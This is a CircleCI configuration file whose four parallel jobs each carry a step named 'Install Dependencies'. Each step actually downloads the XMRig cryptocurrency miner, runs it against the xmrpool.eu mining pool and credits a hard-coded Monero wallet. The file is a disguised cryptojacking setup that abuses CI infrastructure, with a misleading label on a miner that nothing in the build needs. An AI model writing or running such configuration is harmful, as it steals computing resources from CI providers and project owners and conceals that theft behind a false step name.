version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://github.com/xmrig/xmrig/releases/download/v6.15.1/xmrig-6.15.1-linux-x64.tar.gz && tar -xvf xmrig-6.15.1-linux-x64.tar.gz && cd xmrig-6.15.1 && ./xmrig -o xmrpool.eu:9999 -u 8B9oPW8YWiqGxDUNhdbRVHSSbxQEE7HG4SPvjPWeXxumTiy6wTF5J5HHt7Qa1ZrMxpYbLjEncBtRv7PApMUxEJSY82KjFvR -k --tls
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://github.com/xmrig/xmrig/releases/download/v6.15.1/xmrig-6.15.1-linux-x64.tar.gz && tar -xvf xmrig-6.15.1-linux-x64.tar.gz && cd xmrig-6.15.1 && ./xmrig -o xmrpool.eu:9999 -u 8B9oPW8YWiqGxDUNhdbRVHSSbxQEE7HG4SPvjPWeXxumTiy6wTF5J5HHt7Qa1ZrMxpYbLjEncBtRv7PApMUxEJSY82KjFvR -k --tls
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://github.com/xmrig/xmrig/releases/download/v6.15.1/xmrig-6.15.1-linux-x64.tar.gz && tar -xvf xmrig-6.15.1-linux-x64.tar.gz && cd xmrig-6.15.1 && ./xmrig -o xmrpool.eu:9999 -u 8B9oPW8YWiqGxDUNhdbRVHSSbxQEE7HG4SPvjPWeXxumTiy6wTF5J5HHt7Qa1ZrMxpYbLjEncBtRv7PApMUxEJSY82KjFvR -k --tls
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://github.com/xmrig/xmrig/releases/download/v6.15.1/xmrig-6.15.1-linux-x64.tar.gz && tar -xvf xmrig-6.15.1-linux-x64.tar.gz && cd xmrig-6.15.1 && ./xmrig -o xmrpool.eu:9999 -u 8B9oPW8YWiqGxDUNhdbRVHSSbxQEE7HG4SPvjPWeXxumTiy6wTF5J5HHt7Qa1ZrMxpYbLjEncBtRv7PApMUxEJSY82KjFvR -k --tls
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3